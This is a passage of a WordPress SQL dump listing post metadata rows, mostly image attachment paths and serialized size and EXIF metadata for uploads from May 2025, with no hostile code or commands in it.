(3210,1197,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:961;s:6:\"height\";i:1704;s:4:\"file\";s:25:\"2025/05/293289_0-Copy.jpg\";s:8:\"filesize\";i:177623;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"293289_0-Copy-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13849;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"293289_0-Copy-578x1024.jpg\";s:5:\"width\";i:578;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103725;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"293289_0-Copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7320;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"293289_0-Copy-768x1362.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1362;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:159305;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"293289_0-Copy-866x1536.jpg\";s:5:\"width\";i:866;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:190450;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"293289_0-Copy-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16753;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3211,1198,'_wp_attached_file','2025/05/S__75415557-Copy.jpg'),
(3212,1198,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:28:\"2025/05/S__75415557-Copy.jpg\";s:8:\"filesize\";i:409288;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"S__75415557-Copy-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14168;}s:5:\"large\";a:5:{s:4:\"file\";s:29:\"S__75415557-Copy-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111171;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"S__75415557-Copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6814;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:28:\"S__75415557-Copy-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68660;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:29:\"S__75415557-Copy-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:213481;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:28:\"S__75415557-Copy-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18071;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3214,1186,'_thumbnail_id','1190'),
(3215,1186,'_edit_last','1'),
(3217,1186,'title_style','default'),
(3218,1186,'_title_style','field_5d1a0217cf408'),
(3219,1186,'related',''),
(3220,1186,'_related','field_603b51c3e183e'),
(3221,1199,'title_style','default'),
(3222,1199,'_title_style','field_5d1a0217cf408'),
(3223,1199,'related',''),
(3224,1199,'_related','field_603b51c3e183e'),
(3225,1200,'_edit_lock','1747232989:1'),
(3226,1201,'_wp_attached_file','2025/05/2-68.png'),
(3227,1201,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:16:\"2025/05/2-68.png\";s:8:\"filesize\";i:2381191;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"2-68-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:80455;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"2-68-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:646511;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"2-68-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36313;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"2-68-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:726057;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"2-68-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1353610;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"2-68-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:104468;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3228,1202,'_wp_attached_file','2025/05/3-68.png'),
(3229,1202,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:16:\"2025/05/3-68.png\";s:8:\"filesize\";i:2551787;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"3-68-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:86552;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"3-68-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:714422;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"3-68-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38869;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"3-68-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:808568;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"3-68-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1527320;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"3-68-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:105421;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3230,1203,'_wp_attached_file','2025/05/2-68-1.png'),
(3231,1203,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:18:\"2025/05/2-68-1.png\";s:8:\"filesize\";i:2381191;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"2-68-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:80455;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"2-68-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:646511;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"2-68-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36313;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"2-68-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:726057;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"2-68-1-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1353610;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"2-68-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:104468;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3233,1200,'_thumbnail_id','1203'),
(3234,1200,'_edit_last','1'),
(3236,1200,'title_style','default'),
(3237,1200,'_title_style','field_5d1a0217cf408'),
(3238,1204,'title_style','default'),
(3239,1204,'_title_style','field_5d1a0217cf408'),
(3240,1205,'_edit_lock','1747232953:1'),
(3242,1205,'_edit_last','1'),
(3243,1205,'title_style','default'),
(3244,1205,'_title_style','field_5d1a0217cf408'),
(3245,1205,'related',''),
(3246,1205,'_related','field_603b51c3e183e'),
(3247,1206,'title_style','default'),
(3248,1206,'_title_style','field_5d1a0217cf408'),
(3249,1206,'related',''),
(3250,1206,'_related','field_603b51c3e183e'),
(3251,1205,'_thumbnail_id','1202'),
(3253,1200,'related',''),
(3254,1200,'_related','field_603b51c3e183e'),
(3255,1204,'related',''),
(3256,1204,'_related','field_603b51c3e183e'),
(3264,1208,'_edit_lock','1747277198:1'),
(3265,1209,'_wp_attached_file','2025/05/494681839_122153069156511674_7948308233943019932_n.jpg'),
(3266,1209,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:1240;s:4:\"file\";s:62:\"2025/05/494681839_122153069156511674_7948308233943019932_n.jpg\";s:8:\"filesize\";i:392558;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"494681839_122153069156511674_7948308233943019932_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20711;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"494681839_122153069156511674_7948308233943019932_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136685;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"494681839_122153069156511674_7948308233943019932_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8640;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"494681839_122153069156511674_7948308233943019932_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89629;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"494681839_122153069156511674_7948308233943019932_n-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:248277;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"494681839_122153069156511674_7948308233943019932_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21860;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3267,1210,'_wp_attached_file','2025/05/495090140_122153069060511674_4169399057052512528_n-1.jpg'),
(3268,1210,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:1240;s:4:\"file\";s:64:\"2025/05/495090140_122153069060511674_4169399057052512528_n-1.jpg\";s:8:\"filesize\";i:437451;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"495090140_122153069060511674_4169399057052512528_n-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21429;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"495090140_122153069060511674_4169399057052512528_n-1-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144871;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"495090140_122153069060511674_4169399057052512528_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8835;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"495090140_122153069060511674_4169399057052512528_n-1-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93999;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"495090140_122153069060511674_4169399057052512528_n-1-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:263595;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"495090140_122153069060511674_4169399057052512528_n-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23144;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3269,1211,'_wp_attached_file','2025/05/495205254_122153069210511674_3914265977018363036_n.jpg'),
(3270,1211,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:1240;s:4:\"file\";s:62:\"2025/05/495205254_122153069210511674_3914265977018363036_n.jpg\";s:8:\"filesize\";i:401826;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"495205254_122153069210511674_3914265977018363036_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20675;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"495205254_122153069210511674_3914265977018363036_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:135165;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"495205254_122153069210511674_3914265977018363036_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8664;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"495205254_122153069210511674_3914265977018363036_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88526;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"495205254_122153069210511674_3914265977018363036_n-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:245360;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"495205254_122153069210511674_3914265977018363036_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21760;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3271,1212,'_wp_attached_file','2025/05/495490841_122153069318511674_151330112056767455_n.jpg'),
(3272,1212,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:1240;s:4:\"file\";s:61:\"2025/05/495490841_122153069318511674_151330112056767455_n.jpg\";s:8:\"filesize\";i:400813;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"495490841_122153069318511674_151330112056767455_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21255;}s:5:\"large\";a:5:{s:4:\"file\";s:62:\"495490841_122153069318511674_151330112056767455_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139687;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"495490841_122153069318511674_151330112056767455_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8818;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:61:\"495490841_122153069318511674_151330112056767455_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91492;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:63:\"495490841_122153069318511674_151330112056767455_n-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:254206;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:61:\"495490841_122153069318511674_151330112056767455_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22570;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3273,1213,'_wp_attached_file','2025/05/495194078_122153069252511674_3692708040108996_n.jpg'),
(3274,1213,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:1240;s:4:\"file\";s:59:\"2025/05/495194078_122153069252511674_3692708040108996_n.jpg\";s:8:\"filesize\";i:407206;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"495194078_122153069252511674_3692708040108996_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20972;}s:5:\"large\";a:5:{s:4:\"file\";s:60:\"495194078_122153069252511674_3692708040108996_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:138204;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"495194078_122153069252511674_3692708040108996_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8639;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"495194078_122153069252511674_3692708040108996_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90052;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:61:\"495194078_122153069252511674_3692708040108996_n-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:249523;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:59:\"495194078_122153069252511674_3692708040108996_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22010;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3275,1214,'_wp_attached_file','2025/05/495937641_122153069102511674_5959480539774181867_n.jpg'),
(3276,1214,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:1240;s:4:\"file\";s:62:\"2025/05/495937641_122153069102511674_5959480539774181867_n.jpg\";s:8:\"filesize\";i:387017;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"495937641_122153069102511674_5959480539774181867_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20519;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"495937641_122153069102511674_5959480539774181867_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:134921;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"495937641_122153069102511674_5959480539774181867_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8546;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"495937641_122153069102511674_5959480539774181867_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88511;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"495937641_122153069102511674_5959480539774181867_n-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:244438;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"495937641_122153069102511674_5959480539774181867_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21517;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3278,1208,'_thumbnail_id','1210'),
(3279,1208,'_edit_last','1'),
(3281,1208,'title_style','default'),
(3282,1208,'_title_style','field_5d1a0217cf408'),
(3283,1208,'related',''),
(3284,1208,'_related','field_603b51c3e183e'),
(3285,1215,'title_style','default'),
(3286,1215,'_title_style','field_5d1a0217cf408'),
(3287,1215,'related',''),
(3288,1215,'_related','field_603b51c3e183e'),
(3289,1216,'title_style','default'),
(3290,1216,'_title_style','field_5d1a0217cf408'),
(3291,1216,'related',''),
(3292,1216,'_related','field_603b51c3e183e'),
(3293,1217,'_edit_lock','1747277312:1'),
(3294,1218,'_wp_attached_file','2025/05/492478399_122151342728511674_1569254423643431118_n.jpg'),
(3295,1218,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:1240;s:4:\"file\";s:62:\"2025/05/492478399_122151342728511674_1569254423643431118_n.jpg\";s:8:\"filesize\";i:399209;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"492478399_122151342728511674_1569254423643431118_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19846;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"492478399_122151342728511674_1569254423643431118_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132742;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"492478399_122151342728511674_1569254423643431118_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8384;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"492478399_122151342728511674_1569254423643431118_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87027;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"492478399_122151342728511674_1569254423643431118_n-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:242189;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"492478399_122151342728511674_1569254423643431118_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21324;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}